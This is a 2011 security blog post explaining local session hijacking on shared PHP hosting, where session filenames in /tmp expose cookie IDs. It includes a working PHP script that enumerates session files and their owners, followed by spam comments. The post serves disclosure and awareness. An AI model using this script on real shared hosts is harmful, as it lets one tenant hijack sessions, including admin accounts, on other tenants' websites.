( ~~~ )
  ))^ ^((
 ((* - *))
   _) (_
 / '--' \     ^
//(_  _)\\   /_\
\\ )__( //   .'
 (( v  ))   (
   \| /\     '-.
    K(  \       )
    |\\  '-._.-'
    ||\\
  *_-P/,P
     '-
Want your PHP application manually audited? Check out Xxor AB's PHP Security Auditing Service

Thursday, August 4, 2011

Local Session Hijacking in PHP

Recently I discovered that the shared hosting provider I sometimes use is susceptible to this age-old technique that everyone really should know about by now.

PHP's default session handler stores session data in files. And by default these files are placed in /tmp. In a shared enviroment session files should never be placed in a directory that can be read by a malicious local user like the world readable /tmp directory.

Even if the session files might be protected from being read or written by a malicious user, their name leaks valuable information. The name of a typical session file name reads "sess_0m9gnkgenne66kvs3eklhvucjmdpchto". All the numbers and letters following "sess_" are those of the PHPSESSID cookie which that session is tied to. Any local user who can enumerate the files in this directory can therefor hijack the cookies belonging to the visitors of all the websites located in the shared host. One of them might belong to an admin at one of the local websites.

POC

Here is a short script to enumerate session files and their respective local owner. <?php // http://ha.xxor.se/2011/08/local-session-hijacking.html // Retrieve the path where session files are saved session_save_path(); // Might have to be called twice... not sure. $sesspath = session_save_path(); if(php_sapi_name()!=='cli')echo "<pre>\n"; // Test session.save_handler $sessmod = session_module_name(); if(empty($sessmod))$sessmod = ini_get('session.save_handler'); echo "[i] Session save handler: $sessmod\n"; if($sessmod !== 'files'){ echo "[!] Possible Error: session.save_handler is set to '$sessmod' instead of 'files'. Trying anyway.\n"; } if(empty($sesspath)){ $sesspath = ini_get('session.save_path'); if(empty($sesspath)){ if(function_exists('sys_get_temp_dir')){ $sesspath = sys_get_temp_dir(); }else{ die('Error:Cant fins session save path. Try setting it manualy.'); } } } $sesspath = array_pop(explode(';',$sesspath)); echo "[i] Session save path: $sesspath\n"; // Enumerate sessions and their owner. clearstatcache(); echo "\nOwner File\n"; if(!findSessIn($sesspath)){ die("[!] Error: Cannot open the session save path.\n"); } function findSessIn($dir){ if(!($handler = opendir($dir))){ return false; } while ($file = readdir($handler)){ $path = substr($dir, -1) === DIRECTORY_SEPARATOR ? $dir.$file : $dir.DIRECTORY_SEPARATOR.$file; if (substr($file, 0, 5) === 'sess_'){ $owner = fileowner($path); if(function_exists('posix_getpwuid')){ $owner = posix_getpwuid($owner); $owner = $owner['name']; } if(strlen($owner) < 16)$owner = substr($owner.str_repeat(' ',15), 0, 15); echo "$owner $path\n"; }elseif(strlen($file) === 1 && is_dir($path) && $file !== '.'){ findSessIn($path); } } closedir($handler); return true; } ?> To find out which website corresponds to which local user, simply visit the website, grab your cookie and then search for its value and the local user in the list.

20 comments:

  1. @Anonymous
    @Lagripe-dz

    Thank you.
    If you like messing with session, stay tuned.
    I've got an interesting series of articles about session poisoning coming up.

    ReplyDelete
  2. Please keep this kind of blog-posts coming.

    The articles are very well written, and gives good insights that other blogs dont.

    Thx for sharing :]

    ReplyDelete
  3. Informative post!! It means a lot to me. Other than this, Get Free Subscribers and Free YouTube views in few seconds! Use it daily to get free subs, likes & views from real channel owners, just like you!

    ReplyDelete
  4. best induction cooktop. The articles are very well written, and gives good insights that other blogs dont.

    ReplyDelete
  5. I think hosting provider companies should also provide their services regarding server related problems, because server related problems are very common and a lot of people suffer from this. Essay Writing Service

    ReplyDelete
  6. Are you also searching for spanish nursing writing services we are the best solution for you. We are best known for delivering the best services to students.  

    ReplyDelete
  7. this is great:https://www.nursingwritingcenter.com/nursing-writing-services

    ReplyDelete
  8. This comment has been removed by the author.

    ReplyDelete
  9. This comment has been removed by the author.

    ReplyDelete
  10. Excellent post. I really enjoy reading and also appreciate your work. This concept is a good way to enhance knowledge. Keep sharing this kind of articles, Thank you.Hire A Professional Lottery Hacker in Usa

    ReplyDelete
  11. You have shared a very informative article. I was looking for the kind of unique information local users. Keep sharing more solutions on this topic. Now it's time to get Long distance taxi for more information.

    ReplyDelete
  12. Great information in this article. It's really helpful and useful for all local users and marketers. Thank you for taking the time to share a short script to enumerate session files. Now it's time to get inbound call center for more information.

    ReplyDelete
  13. Coding is tough to work. This is a nice way to explain the topic in easy language. The steps are more easily understandable. Now its time to avail Emergency Shutter Repair London for more inofrmation.

    ReplyDelete
  14. This one is very good for PHP user. You share such a great information in this article. I hope you will share more good updates. Now it's time to avail luxury airport transfer for more information.

    ReplyDelete
  15. Thanks for sharing this post. I got information on this site. Keep sharing.
    divorce new jersey

    ReplyDelete
  16. Thank you for sharing this informative blog with us. Your blog is very useful for us. Are you an aspiring engineer looking to pursue a career in Australia? cdr writing services in Australia play a pivotal role in assisting aspiring engineers to navigate the rigorous assessment process set by Engineers Australia. A CDR is a crucial document for foreign engineers seeking skilled migration to Australia, as it showcases their competencies and experiences in alignment with the Australian engineering standards. In Australia, CDR writing services are dedicated to helping candidates craft compelling and accurate reports that adhere to the guidelines provided by Engineers Australia.

    ReplyDelete